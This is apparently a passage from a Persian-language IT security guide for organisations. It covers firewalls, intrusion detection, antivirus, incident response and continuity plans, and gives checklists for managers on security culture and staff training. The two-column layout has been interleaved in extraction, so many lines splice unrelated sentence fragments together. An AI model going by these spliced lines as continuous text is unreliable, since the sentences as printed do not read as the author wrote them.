ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ .ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﻛـﺎﺭﺑﺮ ﻳـﻚ
ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺖ ﻧﺎﻡ ﻳﺎ ﺷﻤﺎﺭﻩ ﺣﺴﺎﺏ )ﺩﺍﺩﺓ ﻣﻌﺮﻓﻲ( ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺭﻣﺰ ﻋﺒﻮﺭ
ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﻣﻌﻤﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺳﺘﺮﺳـﻲ )ﺩﺍﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ( ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣـﻲﻛﻨـﺪ .ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺑﻪ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺍﺳﺖ. ﺩﺳﺘﺮﺳﻲ ﺍﻭﻟﻴﻦ ﺧـﻂ ﺗـﺪﺍﻓﻌﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲ ﺁﻳﻨـﺪ ﻭ
ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑــﺮ ﺍﺳــﺎﺱ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ،ﻧــﺸﺎﻧﻬﺎ،
.۱۰ﺭﺍﻫﺒﺮﻱ ﺻﺤﻴﺢ ﺳﻴﺴﺘﻤﻬﺎ -ﺍﻳـﻦ ﻣـﻮﺭﺩ ﺑﺎﻳـﺪ ﺑـﺎ
ﻣﺸﺨﺼﻪﻫﺎﻱ ﺯﻳﺴﺘﻲ ،ﻭ ﻳـﺎ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ
ﺗﻬﻴﺔ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﺭﺍﻫﺒﺮﻱ ﻛـﻪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ
ﺑﺎﺷﻨﺪ.
ﻣﺆﺳﺴﺎﺕ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺎﻟﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻭ ﻧﻴﺰ ﻓﻬﺮﺳﺘﻲ
ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺗﻜﻤﻴﻞ ﮔﺮﺩﺩ. ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ -ﺍﻳﺠﺎﺩ ﻳﻚ ﺳﻴﺴﺘﻢ ﻭ ﻳﺎ ﺗﺮﻛﻴﺒـﻲ .۴
ﺍﺯ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺷﺒﻜﻪ ،ﻣﺮﺯ ﻣﺸﺨﺺ
.۱۱ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺪﻳﺮﻳﺖ ﺳﻴﺎﺳﺖ -ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳـﻚ
ﻛﻨﺪ.
ﻝ ﺍﺟﺮﺍﻱ ﺻـﺤﻴﺢ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﻪ ﻛﻨﺘﺮ ﹺ
ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗـﺪﻭﻳﻦ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍ ﺑﺼﻮﺭﺕ ﻓﻌـﺎﻝ -ﺩﺭ ﺳـﻄﺢ .۵
ﺷﺪﻩﺍﻧﺪ ﺑﭙﺮﺩﺍﺯﺩ. ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ،ﻻﺯﻡ ﺍﺳــﺖ ﻫـﺮ ﺁﻧﭽــﻪ ﻛـﻪ ﻣﻨﺎﺳــﺐ
ﻣﺤﻴﻂ ﻛﺎﺭ ﻧﻴﺴﺖ ﻳﺎ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺼﻮﺏ ﻣﻐـﺎﻳﺮ ﺍﺳـﺖ
.۱۲ﻃﺮﺡ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ ) ١٨٥(IRPﻭ ﺗـﺪﺍﻭﻡ
ﺗﺼﻔﻴﻪ ﺷﻮﺩ.
ﮐﺴﺐ ﻭ ﮐﺎﺭ ) - ١٨٦(BCPﺍﻳـﻦ ﺳـﻨﺪ ﺍﺻـﻠﻲﺗـﺮﻳﻦ
ﺳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻥ ﻣﻲﮔﻮﻳـﺪ ﭼﮕﻮﻧـﻪ ﻳـﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳـﺎﺏ ) - (IDSﺍﻳـﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢ .۶
ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﺑﻪ ﺁﻥ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﻣﺨﺘﺺ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻔﻮﺫﻫـﺎ ﻳـﺎ ﺗﻼﺷـﻬﺎﻱ ﻧﻔـﻮﺫ ﺍﺳـﺖ،
ﻣﻲﺩﻫﺪ ،ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺁﻧﺮﺍ ﺗﺮﻣﻴﻢ ﻣﻲﻧﻤﺎﻳﺪ .ﺩﺍﺷـﺘﻦ ﻳـﻚ ﻧﻔﻮﺫﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﻛﻤﻚ
IRPﻭ ﺁﺯﻣــﺎﻳﺶ ﺩﻭﺭﻩﺍﻱ ﺁﻥ ﻳﻜــﻲ ﺍﺯ ﺍﺻــﻠﻲﺗــﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺒﺮﺓ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ
ﺣﺮﺑﻪﻫﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺍﺳﺖ. ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ١٨٤ﻭ ﺳـﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲ ﻛﻨﺪ .ﺭﻭﺷﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺴﺘﻪ ﺑﻪ ﻋﻮﺍﻣﻠﻲ ﭼـﻮﻥ ﺍﻧـﻮﺍﻉ
١٨٧
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ ﺣﻤﻼﺗﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺩﻓﺎﻉ ﻛﻨﺪ،
ﻣﺒﺎﺩﻱ ﻧﻔﻮﺫ ،ﺍﻧﻮﺍﻉ ﺩﺍﺭﺍﺋﻴﻬﺎ ،ﻭ ﻣﻴـﺰﺍﻥ ﻧﮕﺮﺍﻧـﻲ ﺩﺭ ﻣـﻮﺭﺩ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﻗﺒﻞ ﺩﻳﺪﻳﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﻫﺮﻳﻚ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎ ،ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﻫﺴﺘﻨﺪ.
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻣﺤﻴﻄﻲ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺁﻥ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﻗﺎﺩﺭ ﺑﻪ
ﻫﻤﻜﺎﺭﻱ ﺟﻬﺖ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺑﺎﺷـﻨﺪ ﻳـﻚ ﻧﻜﺘـﺔ ﻭﻳﺮﻭﺱﻳﺎﺑﻬـﺎ -ﻛﺮﻣﻬـﺎ ،ﺗﺮﺍﻭﺍﻫـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﻫﻤـﻪ .۷
ﻛﻠﻴﺪﻱ ﺍﺳﺖ .ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﻣـﺪﻳﺮﺍﻥ ﺑـﺎ ﻗﻮﺍﻋـﺪ ﺍﺑﺰﺍﺭﻫــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﻫــﺴﺘﻨﺪ .ﻭﻳــﺮﻭﺱ
ﺍﻣﻨﻴﺘــﻲ ﻭ ﻣﻴــﺰﺍﻥ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺁﻧﻬــﺎ ﺩﺭ ﺣــﻮﺯﺓ ﺁﻣــﻮﺯﺵ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻟﻮﺩﻩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ ،ﺗﺄﺛﻴﺮ ﻣـﻲ ﭘﺬﻳﺮﻧـﺪ. ﺳﻴﺴﺘﻢ ،ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ .ﺗﺮﺍﻭﺍﻫﺎ ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻳـﺎ ﺑـﻪ
ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎ ﻣﺘﺼﻞ ﻧﻤﻲﻛﻨﻨﺪ .ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻣﺨﺮﺏ ﻭ ﺁﺳﻴﺐﺭﺳﺎﻥ ﺭﺍ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ.
185 Incident Response Plan
186 Business Continuity Plan
۱۸۷ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﺳﻮﻡ ،ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ ،ﺹ ۵۰ 184 Log Files
١٩٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺷﺮﻛﺖ ﻛﻪ ﺍﺟـﺮﺍﻱ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻫﺒﺮﻱ ﻣﻲﻛﻨﻨﺪ ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﻤﻨﻈﻮﺭ ﺗﺮﻭﻳﺞ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘﻲ ،ﻣﺪﻳﺮﺍﻥ ﺑﺎﻳﺪ:
ﺁﻳﺎ ﺧﻼﺻﻪ ﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ؟ •
ﺗﻮﺿﻴﺢ ﺩﻫﻨﺪ ﻛﻪ ﻋﻨﺎﺻﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺧـﻮﺏ ﭼـﻪ •
ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
ﭼﻴﺰﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ.
ﺁﻳﺎ ﺍﺯ ﺳﻄﻮﺡ ﺑﺎﻻﻱ ﻣﺪﻳﺮﻳﺖ ﺗﺎ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻳـﻚ •
ﺗﺄﻛﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺗﻤﺎﻡ ﺳـﻄﻮﺡ ﺳـﺎﺯﻣﺎﻥ ﺑـﺴﻴﺎﺭ •
ﻣﺴﻴﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﻣﻬﻢ ﺍﺳﺖ.
ﺁﻳﺎ ﻫﻤﻪ ﻣـﻲﺩﺍﻧﻨـﺪ ﻛـﻪ ﺁﻥ ﻣـﺴﻴﺮ ﺍﺭﺗﺒـﺎﻃﻲ ﭼﻴـﺴﺖ ﻭ •
ﺍﻓﺮﺍﺩ ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ﭘﺮﺳﻴﺪﻥ ﺳـﺆﺍﻝ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻭ •
ﻛﺠﺎﺳﺖ؟
ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺮﻏﻴﺐ ﻧﻤﺎﻳﻨﺪ.
ﺁﻳﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮ ﻋﻬﺪﺓ ﻳﻜـﻲ ﺍﺯ ﻣـﺪﻳﺮﺍﻥ، •
ﺍﺯ ﻛﻠﻴﺔ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﺑـﺴﻴﺎﺭ ﻫﻮﺷـﻴﺎﺭ •
ﻼ ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﻣﺪﻳﺮ ﻋﺎﻣﻞ ﺳﺎﺯﻣﺎﻥ ،ﻳﺎ ﻣﺪﻳﺮ ﺍﻣﻨﻴـﺖ ،ﻳـﺎ
ﻣﺜ ﹰ
ﺑﺎﺷﻨﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻣﻌﻤﻮﻝ )ﺩﺭ ﻣﺤـﻴﻂ ﺍﺩﺍﺭﻩ ﻳـﺎ ﺩﺭ
ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
ﺳﻄﺢ ﺷﺒﻜﻪ( ﺭﺍ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ.
ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﺭﺍﺋﻪ ﻭ ﺍﻋﻤـﺎﻝ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴﺘـﻲ ﺳـﺎﺯﻣﺎﻥ، •
•
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻭﻝ ﻗــﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻋﻤــﺪﻱ ﻗﺎﺑــﻞ ﺷﺪﻩ ﻭ ﺑﻮﺩﺟﺔ ﻣﺮﺑﻮﻃـﻪ ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ ﺁﻥ ﺗﺨـﺼﻴﺺ ﻳﺎﻓﺘـﻪ
ﭼﺸﻢﭘﻮﺷﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ. ﺍﺳﺖ؟
ﻓﻬﺮﺳﺖ ﺯﻳﺮ ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺁﻳﺎ ﻫﻤﺔ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻫﻤﻴﺖ ﮔﺰﺍﺭﺵ ﻭ •
ﻛﺎﺭﻛﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﻮﺯﺵ ﺣﻞ ﺳﺮﻳﻊ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨﺪ؟
ﺩﻫﻨﺪ: ﺁﻳﺎ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ ﺍﺯ •
١٨٨
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺟﺪﻳﺪ ﻫﻤـﺔ ﺳـﻄﻮﺡ
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺁﻣﻮﺯﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ -ﺍﺯ ﻛﺎﺭﻛﻨــﺎﻥ ﺧــﻂ ﺗﻮﻟﻴــﺪ ﮔﺮﻓﺘــﻪ ﺗــﺎ ﺳــﻄﻮﺡ ﺑــﺎﻻﻱ
ﺁﻳﺎ ﻫﻤﺔ ﻣﺪﻳﺮﺍﻥ ﺭﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴـﺖ • ﻣﺪﻳﺮﻳﺘﻲ -ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
ﺳﺎﺯﻣﺎﻧﻲ ﻣﺘﻌﻬﺪ ﻫﺴﺘﻨﺪ؟ ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺁﮔﺎﻫﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻤﺎﻡ ﺭﺩﻩﻫﺎ ﻧﺴﺒﺖ •
ﺁﻳﺎ ﺑﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺟﻬﺖ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﺍﺯ ﺍﻳـﻦ • ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷـﺮﻛﺖ ﮔﺎﻣﻬـﺎﻱ
ﺗﻌﻬﺪ ﺣﻤﺎﻳﺖ ﻛﺮﺩﻩﺍﻧﺪ؟ ﻻﺯﻡ ﺑﺮﺩﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
ﺁﻳﺎ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ ﺁﻣﻮﺯﺷـﻲ ﺷـﺎﻣﻞ ﺟﺰﺋﻴـﺎﺕ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ • ﺁﻳــﺎ ﻫﻨﮕــﺎﻡ ﺗــﺪﻭﻳﻦ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺑــﻪ •
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ؟ ﻭﺍﻗﻌﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﻫﻨﮓ ﺷـﺮﻛﺖ )ﺭﻭﺍﺑـﻂ ﻣـﺪﻳﺮﺍﻥ ﻭ
ﻛﺎﺭﻣﻨﺪﺍﻥ( ﺗﻮﺟﻪ ﺷﺪﻩ ﺍﺳﺖ؟
ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﻌﻴﻴﻦﺷﺪﻩﺍﻱ ﻭﺟﻮﺩ •
ﺩﺍﺭﺩ؟ ﺁﻳﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﻣـﺸﻜﻼﺕ •
ﺍﻣﻨﻴﺘﻲ )ﻳﺎ ﺩﺭ ﺟﺎﻳﻲ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺁﮔﺎﻩ ﻧﻴﺴﺘﻨﺪ( ﺑﺎﻳﺪ
ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻛﺎﻣﻞ ﻭ ﺑﻪﺭﻭﺯ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺍﺯ •
ﺍﺯ ﭼﻪ ﻛﺴﻲ ﻛﻤﻚ ﺑﺨﻮﺍﻫﻨﺪ؟
ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ؟
ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؟ •
ﻫﺮ ﺷﺶ ﻣﺎﻩ ﻳﻜﺒﺎﺭ؟ ﻫﺮ ﺳﺎﻝ ﻳﻜﺒﺎﺭ؟
۱۸۸ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﭘﻨﺠﻢ ،ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ،ﺹ ۸۱
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٠٠
١٩٠
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ ﺁﻳــﺎ ﻫﻤــﺔ ﻛﺎﺭﻣﻨــﺪﺍﻥ )ﺍﺯ ﺟﻤﻠــﻪ ﻣــﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳــﻲ( ﺩﺭﺑــﺎﺭﺓ •
ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺩﺭ ﻗﺒـﺎﻝ ﺷـﺮﻛﺖ ﺁﻣـﻮﺯﺵ
ﺁﻳﺎ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺁﻥ ﻫﺴﺘﻴﺪ ﻭﺍﻗﻔﻴﺪ؟ •
ﺩﻳﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﻧﻴﺰ ﺩﺭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺩﺧﻴﻞ ﺑﻮﺩﻩ ﺍﺳﺖ؟ •
ﺁﻳﺎ ﭼﺎﺭﭼﻮﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺗﺪﺍﻭﻡ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻭﺟـﻮﺩ •
ﺁﻳﺎ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻧﺜﺮ ﺭﻭﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ • ﺩﺍﺭﺩ؟
ﺩﺭﻙ ﻫﺴﺘﻨﺪ؟
ﺁﻳﺎ ﻫﻤﺔ ﺍﻓـﺮﺍﺩ ﺑـﻪ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﺩﺳﺘﺮﺳـﻲ • ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ
ﺩﺍﺭﻧﺪ؟ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺩﻭﻡ ،ﺳﻮﻡ ،ﻭ ﭼﻬﺎﺭﻡ ،ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺭﺍﻳـﺞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ
ﺁﻳﺎ ﻛﺴﻲ ﺷﺨﺼﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﻣـﺴﺌﻮﻟﻴﺖ • ﺑﺮﺭﺳﻲ ﻛﺮﺩﻳﻢ )ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ( ﻭ ﺭﻭﺷﻬﺎﻱ ﺗﺤﻠﻴـﻞ ﺧـﺴﺎﺭﺗﻬﺎ ﺭﺍ
ﺻﺮﻳﺢ ﺩﺍﺭﺩ؟ ﺷﺮﺡ ﺩﺍﺩﻳﻢ ،ﻭ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌﺪﻱ ﻧﻴﺰ ﺑﻪ ﺍﺭﺍﺋﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ -ﻛﻪ ﺑﻪ ﺗﻘﻮﻳﺖ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ
